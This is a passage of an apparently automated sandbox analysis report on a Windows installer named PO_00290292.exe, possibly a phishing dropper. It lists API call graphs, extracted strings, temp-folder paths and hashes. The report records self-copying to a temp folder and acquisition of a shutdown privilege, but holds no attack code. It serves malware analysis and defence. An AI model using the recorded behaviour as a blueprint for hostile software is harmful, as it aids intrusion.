3859->3861 3860 403358 ReadFile 3860->3876 3863 402ffc GlobalAlloc 3861->3863 3861->3878 3955 40336e SetFilePointer 3861->3955 3862 403054 3865 402d9f 33 API calls 3862->3865 3864 403013 
3863->3864 3870 405d82 2 API calls 3864->3870 3865->3878 3867 402fdd 3868 403358 ReadFile 3867->3868 3871 402fe8 3868->3871 3869 402d9f 33 API calls 3869->3876 3872 403024 CreateFileW 3870->3872 3871->3863 3871->3878 3873 40305e 3872->3873 3872->3878 3954 40336e SetFilePointer 3873->3954 3875 40306c 3877 4030e7 45 API calls 3875->3877 3876->3858 3876->3860 3876->3862 3876->3869 3876->3878 3877->3878 3878->3776 3880 406558 5 API calls 3879->3880 3881 4039db 3880->3881 3882 4039e1 3881->3882 3883 4039f3 3881->3883 3965 4060c5 wsprintfW 3882->3965 3884 40604b 3 API calls 3883->3884 3885 403a23 3884->3885 3886 403a42 lstrcatW 3885->3886 3888 40604b 3 API calls 3885->3888 3889 4039f1 3886->3889 3888->3886 3956 403c9d 3889->3956 3892 405c3a 18 API calls 3893 403a74 3892->3893 3894 403b08 3893->3894 3896 40604b 3 API calls 3893->3896 3895 405c3a 18 API calls 3894->3895 3897 403b0e 3895->3897 3898 403aa6 3896->3898 3899 403b1e LoadImageW 3897->3899 3902 4061a0 18 API calls 3897->3902 3898->3894 3905 403ac7 lstrlenW 3898->3905 3909 405b5f CharNextW 3898->3909 3900 403bc4 3899->3900 3901 403b45 RegisterClassW 3899->3901 3904 40140b 2 API calls 3900->3904 3903 403b7b SystemParametersInfoW CreateWindowExW 3901->3903 3934 403bce 3901->3934 3902->3899 3903->3900 3908 403bca 3904->3908 3906 403ad5 lstrcmpiW 3905->3906 3907 403afb 3905->3907 3906->3907 3911 403ae5 GetFileAttributesW 3906->3911 3912 405b32 3 API calls 3907->3912 3914 403c9d 19 API calls 3908->3914 3908->3934 3910 403ac4 3909->3910 3910->3905 3913 403af1 3911->3913 3915 403b01 3912->3915 3913->3907 3916 405b7e 2 API calls 3913->3916 3917 403bdb 3914->3917 3966 40617e lstrcpynW 3915->3966 3916->3907 3919 403be7 ShowWindow 3917->3919 3920 403c6a 3917->3920 3922 4064e8 3 API calls 3919->3922 3921 4053b0 5 API calls 3920->3921 3923 403c70 3921->3923 3924 403bff 3922->3924 3925 403c74 3923->3925 3926 403c8c 3923->3926 3927 403c0d GetClassInfoW 3924->3927 3931 4064e8 3 API calls 3924->3931 3933 40140b 2 API calls 
3925->3933 3925->3934 3930 40140b 2 API calls 3926->3930 3928 403c21 GetClassInfoW RegisterClassW 3927->3928 3929 403c37 DialogBoxParamW 3927->3929 3928->3929 3932 40140b 2 API calls 3929->3932 3930->3934 3931->3927 3932->3934 3933->3934 3934->3793 3935->3784 3936->3816 3937->3785 3939 406558 5 API calls 3938->3939 3940 403734 lstrcatW 3939->3940 3940->3810 3940->3811 3942 4057fd GetLastError 3941->3942 3943 403776 3941->3943 3942->3943 3944 40580c SetFileSecurityW 3942->3944 3943->3820 3944->3943 3945 405822 GetLastError 3944->3945 3945->3943 3947 405839 3946->3947 3948 40583d GetLastError 3946->3948 3947->3820 3948->3947 3949->3822 3950->3834 3951->3851 3952->3853 3953->3857 3954->3875 3955->3867 3957 403cb1 3956->3957 3967 4060c5 wsprintfW 3957->3967 3959 403d22 3960 4061a0 18 API calls 3959->3960 3961 403d2e SetWindowTextW 3960->3961 3962 403a52 3961->3962 3963 403d4a 3961->3963 3962->3892 3963->3962 3964 4061a0 18 API calls 3963->3964 3964->3963 3965->3889 3966->3894 3967->3959 4600 401b37 4601 401b44 4600->4601 4602 401b88 4600->4602 4605 401bcd 4601->4605 4610 401b5b 4601->4610 4603 401bb2 GlobalAlloc 4602->4603 4604 401b8d 4602->4604 4607 4061a0 18 API calls 4603->4607 4618 402288 4604->4618 4621 40617e lstrcpynW 4604->4621 4606 4061a0 18 API calls 4605->4606 4605->4618 4608 402282 4606->4608 4607->4605 4613 4058c3 MessageBoxIndirectW 4608->4613 4619 40617e lstrcpynW 4610->4619 4611 401b9f GlobalFree 4611->4618 4613->4618 4614 401b6a 4620 40617e lstrcpynW 4614->4620 4616 401b79 4622 40617e lstrcpynW 4616->4622 4619->4614 4620->4616 4621->4611 4622->4618 4623 402537 4624 402562 4623->4624 4625 40254b 4623->4625 4627 402596 4624->4627 4628 402567 4624->4628 4626 402ba2 18 API calls 4625->4626 4633 402552 4626->4633 4630 402bbf 18 API calls 4627->4630 4629 402bbf 18 API calls 4628->4629 4631 40256e WideCharToMultiByte lstrlenA 4629->4631 4632 40259d lstrlenW 4630->4632 4631->4633 4632->4633 4634 4025e0 4633->4634 4636 405e34 5 API calls 4633->4636 4637 4025ca 
4633->4637 4635 405e05 WriteFile 4635->4634 4636->4637 4637->4634 4637->4635 4638 4014b8 4639 4014be 4638->4639 4640 401389 2 API calls 4639->4640 4641 4014c6 4640->4641 3968 4015b9 3969 402bbf 18 API calls 3968->3969 3970 4015c0 3969->3970 3971 405bdd 4 API calls 3970->3971 3985 4015c9 3971->3985 3972 401629 3974 40165b 3972->3974 3975 40162e 3972->3975 3973 405b5f CharNextW 3973->3985 3977 401423 25 API calls 3974->3977 3976 401423 25 API calls 3975->3976 3978 401635 3976->3978 3984 401653 3977->3984 3987 40617e lstrcpynW 3978->3987 3979 405829 2 API calls 3979->3985 3981 405846 5 API calls 3981->3985 3982 401642 SetCurrentDirectoryW 3982->3984 3983 40160f GetFileAttributesW 3983->3985 3985->3972 3985->3973 3985->3979 3985->3981 3985->3983 3986 4057ac 4 API calls 3985->3986 3986->3985 3987->3982 4649 40293b 4650 402ba2 18 API calls 4649->4650 4651 402941 4650->4651 4652 402964 4651->4652 4653 40297d 4651->4653 4659 40281e 4651->4659 4654 402969 4652->4654 4655 40297a 4652->4655 4656 402993 4653->4656 4657 402987 4653->4657 4663 40617e lstrcpynW 4654->4663 4664 4060c5 wsprintfW 4655->4664 4658 4061a0 18 API calls 4656->4658 4660 402ba2 18 API calls 4657->4660 4658->4659 4660->4659 4663->4659 4664->4659

Control-flow Graph (graph for entry function 4033b6: SetErrorMode, GetVersion, OleInitialize, SHGetFileInfoW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, DeleteFileW, ExitProcess paths; rendered graph not reproduced here)
                                                                  APIs
                                                                  • SetErrorMode.KERNELBASE ref: 004033D9
                                                                  • GetVersion.KERNEL32 ref: 004033DF
                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403408
                                                                  • #17.COMCTL32(00000007,00000009), ref: 0040342B
                                                                  • OleInitialize.OLE32(00000000), ref: 00403432
                                                                  • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 0040344E
                                                                  • GetCommandLineW.KERNEL32(00429240,NSIS Error), ref: 00403463
                                                                  • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\PO_00290292.exe",00000000), ref: 00403476
                                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\PO_00290292.exe",00000020), ref: 0040349D
                                                                    • Part of subcall function 00406558: GetModuleHandleA.KERNEL32(?,00000020,?,0040341F,00000009), ref: 0040656A
                                                                    • Part of subcall function 00406558: GetProcAddress.KERNEL32(00000000,?), ref: 00406585
                                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004035D7
                                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004035E8
                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035F4
                                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403608
                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403610
                                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403621
                                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403629
                                                                  • DeleteFileW.KERNELBASE(1033), ref: 0040363D
                                                                    • Part of subcall function 0040617E: lstrcpynW.KERNEL32(?,?,00000400,00403463,00429240,NSIS Error), ref: 0040618B
                                                                  • ExitProcess.KERNEL32(?), ref: 00403703
                                                                  • OleUninitialize.OLE32(?), ref: 00403708
                                                                  • ExitProcess.KERNEL32 ref: 00403729
                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 0040373C
                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 0040374B
                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403756
                                                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PO_00290292.exe",00000000,?), ref: 00403762
                                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040377E
                                                                  • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,?), ref: 004037D8
                                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\PO_00290292.exe,00420EE8,00000001), ref: 004037EC
                                                                  • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000), ref: 00403819
                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403848
                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 0040384F
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403864
                                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 00403887
                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 004038AC
                                                                  • ExitProcess.KERNEL32 ref: 004038CF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: Processlstrcat$ExitFile$Handle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                  • String ID: "C:\Users\user\Desktop\PO_00290292.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement$C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement$C:\Users\user\Desktop$C:\Users\user\Desktop\PO_00290292.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                  • API String ID: 354199918-1646223993
                                                                  • Opcode ID: 1d8223e16c8a6003b83d058067bded84b497836c53eb7fdc95fb885acef81e31
                                                                  • Instruction ID: be8551fa6605ebbbfda7487142ffb020be8bd547a3943651712312bea09c5587
                                                                  • Opcode Fuzzy Hash: 1d8223e16c8a6003b83d058067bded84b497836c53eb7fdc95fb885acef81e31
                                                                  • Instruction Fuzzy Hash: AED10571200300ABE7207F659D49A2B3AEDEB4074AF50443FF881B62D2DB7C8956876E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetDlgItem.USER32(?,00000403), ref: 0040547A
                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00405489
                                                                  • GetClientRect.USER32(?,?), ref: 004054C6
                                                                  • GetSystemMetrics.USER32(00000002), ref: 004054CD
                                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054EE
                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054FF
                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405512
                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405520
                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405533
                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405555
                                                                  • ShowWindow.USER32(?,00000008), ref: 00405569
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040558A
                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040559A
                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055B3
                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055BF
                                                                  • GetDlgItem.USER32(?,000003F8), ref: 00405498
                                                                    • Part of subcall function 00404277: SendMessageW.USER32(00000028,?,00000001,004040A3), ref: 00404285
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004055DC
                                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_000053B0,00000000), ref: 004055EA
                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004055F1
                                                                  • ShowWindow.USER32(00000000), ref: 00405615
                                                                  • ShowWindow.USER32(?,00000008), ref: 0040561A
                                                                  • ShowWindow.USER32(00000008), ref: 00405664
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405698
                                                                  • CreatePopupMenu.USER32 ref: 004056A9
                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056BD
                                                                  • GetWindowRect.USER32(?,?), ref: 004056DD
                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056F6
                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040572E
                                                                  • OpenClipboard.USER32(00000000), ref: 0040573E
                                                                  • EmptyClipboard.USER32 ref: 00405744
                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405750
                                                                  • GlobalLock.KERNEL32(00000000), ref: 0040575A
                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040576E
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040578E
                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405799
                                                                  • CloseClipboard.USER32 ref: 0040579F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                  • String ID: (7B${
                                                                  • API String ID: 4154960007-525222780
                                                                  • Opcode ID: eb59534d035534922114e87074bc313431370419dc47d72610ca3581fdfcb614
                                                                  • Instruction ID: 3349dadf3efb3a8fdffdb79f187be012afacb07b5928e089a4a7fd9dccbac2fd
                                                                  • Opcode Fuzzy Hash: eb59534d035534922114e87074bc313431370419dc47d72610ca3581fdfcb614
                                                                  • Instruction Fuzzy Hash: 60B15670900608FFDB119FA0DD89EAE3B79FB48354F40847AFA45A61A0CB754E52DF68
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetVersion.KERNEL32(00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,?,00405314,Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00000000,00000000,00000000), ref: 00406263
                                                                  • GetSystemDirectoryW.KERNEL32(Remove folder: ,00000400), ref: 004062E1
                                                                  • GetWindowsDirectoryW.KERNEL32(Remove folder: ,00000400), ref: 004062F4
                                                                  • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406330
                                                                  • SHGetPathFromIDListW.SHELL32(?,Remove folder: ), ref: 0040633E
                                                                  • CoTaskMemFree.OLE32(?), ref: 00406349
                                                                  • lstrcatW.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch), ref: 0040636D
                                                                  • lstrlenW.KERNEL32(Remove folder: ,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,?,00405314,Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00000000,00000000,00000000), ref: 004063C7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                  • String ID: Remove folder: $Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                  • API String ID: 900638850-953462347
                                                                  • Opcode ID: 978d560dfc87019ac3657ebba0841bd774ce65c1ae89d16051c02eb976f42344
                                                                  • Instruction ID: 57c77dc533264c97ace6329bd87f7d674c2bea75a5b3d90d15d675b8bae5a73d
                                                                  • Opcode Fuzzy Hash: 978d560dfc87019ac3657ebba0841bd774ce65c1ae89d16051c02eb976f42344
                                                                  • Instruction Fuzzy Hash: 1E611571A00104EBDF209F24CC40AAE37A5AF15314F56817FED56BA2D0D73D8AA2CB9D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • DeleteFileW.KERNELBASE(?,?,75573420,75572EE0,00000000), ref: 00405998
                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsp6601.tmp\*.*,\*.*), ref: 004059E0
                                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405A03
                                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsp6601.tmp\*.*,?,?,75573420,75572EE0,00000000), ref: 00405A09
                                                                  • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsp6601.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsp6601.tmp\*.*,?,?,75573420,75572EE0,00000000), ref: 00405A19
                                                                  • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AB9
                                                                  • FindClose.KERNEL32(00000000), ref: 00405AC8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                  • String ID: "C:\Users\user\Desktop\PO_00290292.exe"$C:\Users\user\AppData\Local\Temp\nsp6601.tmp\*.*$\*.*
                                                                  • API String ID: 2035342205-1632907102
                                                                  • Opcode ID: 650d65efca721ae95f05fec5e6387b525ef9089e97d219b3eee7621c95804d20
                                                                  • Instruction ID: 6c547db7f4d1248ed83a6ec2b2b7cf99957869ea0eb35c9edb1a86952611c1c3
                                                                  • Opcode Fuzzy Hash: 650d65efca721ae95f05fec5e6387b525ef9089e97d219b3eee7621c95804d20
                                                                  • Instruction Fuzzy Hash: 5A41B530A40914A6CB21AB659CC9AAF7678EF41724F20427FF801711D1D77C5986DE6E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ead38b7015f9474378dd182d16c601773bd961a48b8ca1aefc3332049c463b86
                                                                  • Instruction ID: 84f5b91c3f937eb173619b21672ae23043901769df73ed9f159891f0fc81c8d0
                                                                  • Opcode Fuzzy Hash: ead38b7015f9474378dd182d16c601773bd961a48b8ca1aefc3332049c463b86
                                                                  • Instruction Fuzzy Hash: 72F18671D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7385A8ACF45
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405C83,00425F30,00425F30,00000000,00425F30,00425F30, 4Wu.Wu,?,75572EE0,0040598F,?,75573420,75572EE0), ref: 004064CC
                                                                  • FindClose.KERNELBASE(00000000), ref: 004064D8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: Find$CloseFileFirst
                                                                  • String ID: xgB
                                                                  • API String ID: 2295610775-399326502
                                                                  • Opcode ID: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
                                                                  • Instruction ID: 909a2899cbbcfc21b24ab628f9350e7a3c7b3772aa6d432f74911df6ac2d0bb5
                                                                  • Opcode Fuzzy Hash: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
                                                                  • Instruction Fuzzy Hash: 8BD0C9315045209BC2111778AE4C85B7A98AF553317628A36B466F12A0C674CC22869C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
